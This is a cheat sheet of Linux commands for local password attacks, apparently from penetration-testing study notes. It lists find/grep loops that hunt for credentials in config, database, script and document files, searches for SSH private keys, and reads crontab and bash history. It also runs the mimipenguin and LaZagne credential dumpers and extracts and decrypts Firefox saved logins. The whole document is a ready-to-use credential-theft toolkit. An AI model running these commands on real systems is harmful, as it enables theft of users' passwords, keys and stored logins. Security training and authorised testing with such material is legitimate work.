Linux Local Password Attacks

Command	Description
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib|fonts|share|core" ;done	Script that can be used to find .conf, .config and .cnf files on a Linux system.
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc|lib");do echo -e "\nFile: " $i; grep "user|password|pass" $i 2>/dev/null | grep -v "\#";done	Script that can be used to find credentials in specified file types.
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share|man";done	Script that can be used to find common database files.
find /home/* -type f -name "*.txt" -o ! -name "*.*"	Uses Linux-based find command to search for text files.
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share";done	Script that can be used to search for common file types used with scripts.
for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib|fonts|share|core" ;done	Script used to look for common types of documents.
cat /etc/crontab	Uses Linux-based cat command to view the contents of crontab in search for credentials.
ls -la /etc/cron.*/	Uses Linux-based ls -la command to list all files that start with cron contained in the etc directory.
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"	Uses Linux-based command grep to search the file system for key terms PRIVATE KEY to discover SSH keys.
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"	Uses Linux-based grep command to search for the keywords PRIVATE KEY within files contained in a user's home directory.
grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"	Uses Linux-based grep command to search for keywords ssh-rsa within files contained in a user's home directory.
tail -n5 /home/*/.bash*	Uses Linux-based tail command to search the through bash history files and output the last 5 lines.
python3 mimipenguin.py	Runs Mimipenguin.py using python3.
bash mimipenguin.sh	Runs Mimipenguin.sh using bash.
python2.7 lazagne.py all	Runs Lazagne.py with all modules using python2.7
ls -l .mozilla/firefox/ | grep default	Uses Linux-based command to search for credentials stored by Firefox then searches for the keyword default using grep.
cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .	Uses Linux-based command cat to search for credentials stored by Firefox in JSON.
python3.9 firefox_decrypt.py	Runs Firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9.
python3 lazagne.py browsers	Runs Lazagne.py browsers module using Python 3.